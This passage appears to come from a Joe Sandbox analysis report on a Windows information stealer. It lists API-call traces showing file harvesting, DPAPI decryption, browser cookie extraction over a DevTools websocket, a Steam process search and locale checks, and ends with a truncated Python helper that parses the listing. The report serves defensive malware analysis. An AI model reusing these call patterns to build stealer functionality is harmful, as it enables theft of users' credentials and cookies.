                          • lstrcat.KERNEL32(?,?), ref: 003BE358
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BE36A
                          • lstrcat.KERNEL32(?,?), ref: 003BE37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BE394
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE422
                          • DeleteFileA.KERNEL32(?), ref: 003BE45C
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BE49B
                          • FindClose.KERNEL32(00000000), ref: 003BE4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 1c0d477e30974edcc58014eae897d591a13d368bedb34076eb4f615b13eb19ef
                          • Instruction ID: 972f9b87c2a54da810a5fc0db88fba4e934d81f5c07da261faa2082bc4663f51
                          • Opcode Fuzzy Hash: 1c0d477e30974edcc58014eae897d591a13d368bedb34076eb4f615b13eb19ef
                          • Instruction Fuzzy Hash: 1F818172901219ABCB21EF64DC49AEF77B9FF54300F04499AB50A97151EF34AA48CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A16E2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A176C
                          • lstrcat.KERNEL32(00000000), ref: 003A1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A18FE
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: c6d585700f86bb3c32671c7fe807ce4c40b36ed384b7b748772073364f3c08e1
                          • Instruction ID: 51207edce9366aa22841b902a3cd3fd13df36d7183b1a7cd4d2fad67d672ce61
                          • Opcode Fuzzy Hash: c6d585700f86bb3c32671c7fe807ce4c40b36ed384b7b748772073364f3c08e1
                          • Instruction Fuzzy Hash: AE819531A112169FCB23EFA8D889AAF77B9EF16700F051129F805EB661DB30DC15CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003BDD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003BDD4C
                          • wsprintfA.USER32 ref: 003BDD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BDD79
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BDD9C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BDDB6
                          • wsprintfA.USER32 ref: 003BDDD4
                          • DeleteFileA.KERNEL32(?), ref: 003BDE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BDDED
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                            • Part of subcall function 003BD980: memset.MSVCRT ref: 003BD9A1
                            • Part of subcall function 003BD980: memset.MSVCRT ref: 003BD9B3
                            • Part of subcall function 003BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BD9DB
                            • Part of subcall function 003BD980: lstrcpy.KERNEL32(00000000,?), ref: 003BDA0E
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00000000), ref: 003BDA1C
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00F2EBF0), ref: 003BDA36
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,?), ref: 003BDA4A
                            • Part of subcall function 003BD980: lstrcat.KERNEL32(?,00F2D690), ref: 003BDA5E
                            • Part of subcall function 003BD980: lstrcpy.KERNEL32(00000000,?), ref: 003BDA8E
                            • Part of subcall function 003BD980: GetFileAttributesA.KERNEL32(00000000), ref: 003BDA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BDE2E
                          • FindClose.KERNEL32(00000000), ref: 003BDE3D
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BDE66
                          • lstrcat.KERNEL32(?,00F2DAC0), ref: 003BDE7A
                          • lstrlen.KERNEL32(?), ref: 003BDE84
                          • lstrlen.KERNEL32(?), ref: 003BDE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDED2
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 32813ba15dc26f37e9131c725087e792c6e0c64d93a95525b4250b2da3d816ae
                          • Instruction ID: 8397a81b00d7b48719f06909ceb9509ebfb2e35f83bd8ad6562efc9aebe40b2a
                          • Opcode Fuzzy Hash: 32813ba15dc26f37e9131c725087e792c6e0c64d93a95525b4250b2da3d816ae
                          • Instruction Fuzzy Hash: 38617171A11209ABCB25EF74DC89AEE77B9FF58300F0045AAF506D7251EF34AA58CB50
                          APIs
                          • wsprintfA.USER32 ref: 003BD54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BD564
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BD584
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BD59E
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BD5E3
                          • lstrcat.KERNEL32(?,00F2F230), ref: 003BD5F7
                          • lstrcat.KERNEL32(?,?), ref: 003BD60B
                          • lstrcat.KERNEL32(?,?), ref: 003BD61C
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BD62E
                          • lstrcat.KERNEL32(?,?), ref: 003BD642
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BD682
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BD6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003BD737
                          • FindClose.KERNEL32(00000000), ref: 003BD746
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 0b7fe05b967b6d81d6c052522cd252734f5918e8bffc3ae5f477823bee6b2c89
                          • Instruction ID: 55d8ca77bfc75879c623b331b3112f281e3692ed022d0c325b2e751e0c542edb
                          • Opcode Fuzzy Hash: 0b7fe05b967b6d81d6c052522cd252734f5918e8bffc3ae5f477823bee6b2c89
                          • Instruction Fuzzy Hash: B561A771911119ABCB25EF74DC89ADE77B8EF58304F0044AAE60997250EF34AA58CF90
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: dc94d71983ee43d7916b6138d35356b427c069c806a16c0f2c94b15fd2d3c056
                          • Instruction ID: 7dccc69e37114b70793002beb1da0c1ae91a983890a752024045cac863438541
                          • Opcode Fuzzy Hash: dc94d71983ee43d7916b6138d35356b427c069c806a16c0f2c94b15fd2d3c056
                          • Instruction Fuzzy Hash: 7FA25871D012699BDF21DFA8C890BEDBBB6EF48300F1485AAD509E7241DB716E85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2402
                          • lstrlen.KERNEL32(\*.*), ref: 003B240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B2486
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 1ee079326dc2faa2ab20007e4b9afed338d00e0c0bf8069b853424811fbb7088
                          • Instruction ID: add21f85c2c52844ca364cc3aa61e64178f62406f4e0005668965f8ac322eebb
                          • Opcode Fuzzy Hash: 1ee079326dc2faa2ab20007e4b9afed338d00e0c0bf8069b853424811fbb7088
                          • Instruction Fuzzy Hash: 77417C316112199BCB33EF68EC85ADF73A4EF11304F055229F94A9BA22DF309C158B90
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C46B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C46C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C46DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 003C46ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C4702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C4711
                          • CloseHandle.KERNEL32(00000000), ref: 003C4718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C4726
                          • CloseHandle.KERNEL32(00000000), ref: 003C4731
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: ad65251a08e82ff9b1b07d469b2004898749538fee86245294fa4f169dfd0993
                          • Instruction ID: 49abcf7e0dba4276d827e0087ea246f40dc77a309821fd99ad8a841e2bf32395
                          • Opcode Fuzzy Hash: ad65251a08e82ff9b1b07d469b2004898749538fee86245294fa4f169dfd0993
                          • Instruction Fuzzy Hash: 6201D231602125ABE7315B60EC8DFFA377CEB59B11F04008BF909D1180EF749D88AB60
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003C4628
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C4638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003C4660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C4672
                          • CloseHandle.KERNEL32(00000000), ref: 003C467D
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 4ebc97dea111e39e483fffeb42ac3225f256677d33a92c048fe75498d1e06938
                          • Instruction ID: 5afe2d1aa3f07e7f33248d1c621d63358387edbffd877a60fc4c03991a1420e8
                          • Opcode Fuzzy Hash: 4ebc97dea111e39e483fffeb42ac3225f256677d33a92c048fe75498d1e06938
                          • Instruction Fuzzy Hash: 1701A271602124ABD731AB60AC49FEA77BCEF19350F0401DBED08D1140EF748DA89BE1
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4B7F
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BA7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B4BFA
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 89f030778ae75dc7d0f7a207ac500acdc42a2c50400ea907a791d97157b8bb00
                          • Instruction ID: 12a518da7cd9aea465c5e293b225b44bb17716e247d0fe7862f2d928c5e4dec0
                          • Opcode Fuzzy Hash: 89f030778ae75dc7d0f7a207ac500acdc42a2c50400ea907a791d97157b8bb00
                          • Instruction Fuzzy Hash: 583139316211169BCB37EF68EC85E9F77B9EF51704F050129FA459BA22EB30DC158B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6!6w$BEM$D<Ko$P[_$do}$n*r~$y/qw$1.g
                          • API String ID: 0-41712224
                          • Opcode ID: e51188c7ed00668f994c5c80f2c3be46781c7ebbe295ee30286447a3e921ca70
                          • Instruction ID: 1a2e2cf70b8a5faac39e341114f2fd2d8d2d5a9697c127ed1f99d231cd6e6aba
                          • Opcode Fuzzy Hash: e51188c7ed00668f994c5c80f2c3be46781c7ebbe295ee30286447a3e921ca70
                          • Instruction Fuzzy Hash: CAB207F390C2149FE3046E29EC8567AFBE9EF94720F1A493DEAC4C7744EA3558058693
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003C2D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003C2DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003C2DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C2DEC
                          • LocalFree.KERNEL32(00000000), ref: 003C2FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b872092c48437b90382c2ed120cc31a72faf4e7a5e7fbd464b8d60355b626e28
                          • Instruction ID: d2f9b92b27e8a3b77ea26600530b42710a5c0f8ae605addb725bccfe818dff2a
                          • Opcode Fuzzy Hash: b872092c48437b90382c2ed120cc31a72faf4e7a5e7fbd464b8d60355b626e28
                          • Instruction Fuzzy Hash: 54B10971901214CFD726CF54C948B9AB7F1BB44324F2AC1AED409EB2A2D7769D86CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1v$.>H $E+7n$Ub}|$Zrw($dQyo
                          • API String ID: 0-3060356591
                          • Opcode ID: 82237ad9dc01c14b775b0254cf54f96fae7d171161f818b061e024ea8cd5879c
                          • Instruction ID: a876099fe0eabbc524de1780924ed495ec73f5e06072a5ea8c18cfda41d83c16
                          • Opcode Fuzzy Hash: 82237ad9dc01c14b775b0254cf54f96fae7d171161f818b061e024ea8cd5879c
                          • Instruction Fuzzy Hash: F1B2F6F360C2049FE304AE29EC8567AB7E9EFD4720F1A893DEAC5C7344E63558058697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 003C2C58
                          • wsprintfA.USER32 ref: 003C2C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 7bdc5b66753c7cfb8685385a66afcd22766d7e40d94404e2ef2617f7d2805407
                          • Instruction ID: 20fa4e7a4b1c2c7d80e135c005189a53d44b990129b01cd98b2b33b3545f546b
                          • Opcode Fuzzy Hash: 7bdc5b66753c7cfb8685385a66afcd22766d7e40d94404e2ef2617f7d2805407
                          • Instruction Fuzzy Hash: 3201A771A41604ABD7289F58DC49FAAB769EB84721F00436BF915D77C0D77419048BD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Vx6{$dL_~$z?~$0W$qQi
                          • API String ID: 0-3270706516
                          • Opcode ID: e8974473b526f7a8d4f1c934fd7c83aec87687001f92d74e5759ce25c25ab6e1
                          • Instruction ID: 0b6280f95dd4105ac376171832769bbc99ef775edd8e7074bcb583864f9f68a3
                          • Opcode Fuzzy Hash: e8974473b526f7a8d4f1c934fd7c83aec87687001f92d74e5759ce25c25ab6e1
                          • Instruction Fuzzy Hash: 6CB21AF360C2049FE304AE2DEC8567AFBE9EF94720F16853DEAC4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'ow$`G0F$lk4+$o ?C$s{%
                          • API String ID: 0-2069601964
                          • Opcode ID: 477272c887537a09aa46a02069f6e549b64f48a2d6f32bb6dfd1b7d71fb07dab
                          • Instruction ID: 1ba8bc7175b03022a86decafcd1b2347c009da7003e53b917649b749885981ed
                          • Opcode Fuzzy Hash: 477272c887537a09aa46a02069f6e549b64f48a2d6f32bb6dfd1b7d71fb07dab
                          • Instruction Fuzzy Hash: CBB207F360C2109FE304AE2DEC8567AFBE9EB94360F16493DEAC4C7744E63598058792
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 003C1B72
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C184F
                            • Part of subcall function 003C1820: lstrlen.KERNEL32(00F16D10), ref: 003C1860
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C1887
                            • Part of subcall function 003C1820: lstrcat.KERNEL32(00000000,00000000), ref: 003C1892
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C18C1
                            • Part of subcall function 003C1820: lstrlen.KERNEL32(003D4FA0), ref: 003C18D3
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C18F4
                            • Part of subcall function 003C1820: lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C1900
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C192F
                          • sscanf.NTDLL ref: 003C1B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003C1BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003C1BC6
                          • ExitProcess.KERNEL32 ref: 003C1BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: a728ad8a04dcd5075ed09655b4fe95076014b615d9820d310492d26967a37f02
                          • Instruction ID: c3c84bac139b6a9ad3326d5b60f4307df2b877fc43c58da3806370d54bdecf20
                          • Opcode Fuzzy Hash: a728ad8a04dcd5075ed09655b4fe95076014b615d9820d310492d26967a37f02
                          • Instruction Fuzzy Hash: 2221E4B1518301AF8354EF69D88495BBBF8EED9314F408A1EF599C3220E730D9089BA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003A775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A7765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003A778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003A77AD
                          • LocalFree.KERNEL32(?), ref: 003A77B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 4697f1654ac21c355821ce71e1fda976cb6b260560c9faa892ab8e3f1c920abe
                          • Instruction ID: 0cf91fe7124c431dd4d0543d3b0c550a1f8bb33e3856efa17899229e1b647251
                          • Opcode Fuzzy Hash: 4697f1654ac21c355821ce71e1fda976cb6b260560c9faa892ab8e3f1c920abe
                          • Instruction Fuzzy Hash: 18012575B413197BEB10DB94DC4AFAA7778EB44B11F104156FB09EB2C0D6B1A904C790
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '\$>#a/$@ZB$Ft?]
                          • API String ID: 0-4088510795
                          • Opcode ID: bc60b20e6cd1295e29e6b8bcd95913fd4951bc0093f13266ac34667ae748c143
                          • Instruction ID: 6226d35ce7c587c22126136a75316e9a93dc7ef36c3825742deb913eb03d2568
                          • Opcode Fuzzy Hash: bc60b20e6cd1295e29e6b8bcd95913fd4951bc0093f13266ac34667ae748c143
                          • Instruction Fuzzy Hash: CFB2E8F3A082049FE304AE2DDC85A6AF7E9EFD4720F1A893DE9C4D7744E63558058693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2:fV$W"k$it}f$s{%
                          • API String ID: 0-3960055219
                          • Opcode ID: 38b065e9df4d0d372eff9cd97dabc8e215792f58413ec498cf66cb58e0284ffa
                          • Instruction ID: 234b1315756f04aaba59d6ec3f9cd85bd777bd9e616733e9e70de1d7d5d8988d
                          • Opcode Fuzzy Hash: 38b065e9df4d0d372eff9cd97dabc8e215792f58413ec498cf66cb58e0284ffa
                          • Instruction Fuzzy Hash: C7A206F360C2049FE3046E2DEC8577ABBE5EF94320F1A893DEAC483744EA3559158697
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C3A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C3AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C3ABF
                            • Part of subcall function 003C7310: lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
                            • Part of subcall function 003C7310: lstrcpy.KERNEL32(00000000), ref: 003C733F
                            • Part of subcall function 003C7310: lstrcat.KERNEL32(?,------), ref: 003C7349
                            • Part of subcall function 003C7280: lstrcpy.KERNEL32(00000000), ref: 003C72AE
                          • CloseHandle.KERNEL32(00000000), ref: 003C3BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 86c77c79ea9208db9cdd4ae75bfeaeaf13590a0123fab0e04172315ed7917a76
                          • Instruction ID: 91ca5b798688fa0f7c4229db42f6cd47378c336c8517a99e64e32003419ef269
                          • Opcode Fuzzy Hash: 86c77c79ea9208db9cdd4ae75bfeaeaf13590a0123fab0e04172315ed7917a76
                          • Instruction Fuzzy Hash: 1A811431905214CFC726CF58D888F95B7B1FB44328F2AC1AED4089B2A2D7769D86CF80
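The function above is the report's evidence for the "Searches for specific processes" signature: a Toolhelp32 snapshot of all processes, a Process32First/Process32Next walk, string helpers called on each entry, and CloseHandle at the end. The script below is an added example, not Joe Sandbox code or the sample's own: it parses listing lines of the shape shown here into records (the regex is this example's assumption about the export format), then checks one function for that walk and sanity-checks the listed arguments against the SDK constants (TH32CS_SNAPPROCESS = 2; 0x128 = 296 is sizeof(PROCESSENTRY32) for the ANSI 32-bit structure). The embedded listing is copied from this function's "APIs" block.

```python
"""Turn the per-function "APIs" listing of a Joe Sandbox report into records
and check one function for the Toolhelp32 process walk.  Added example, not
Joe Sandbox code: the line regex and the expected call order are this
example's own assumptions about the listing format shown on the page."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 SDK constants (tlhelp32.h) used to sanity-check the listed arguments.
TH32CS_SNAPPROCESS = 0x00000002
SIZEOF_PROCESSENTRY32_ANSI_X86 = 0x128   # 296 bytes: nine DWORDs + szExeFile[MAX_PATH]

# One listing line, e.g.
#   • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C3A96
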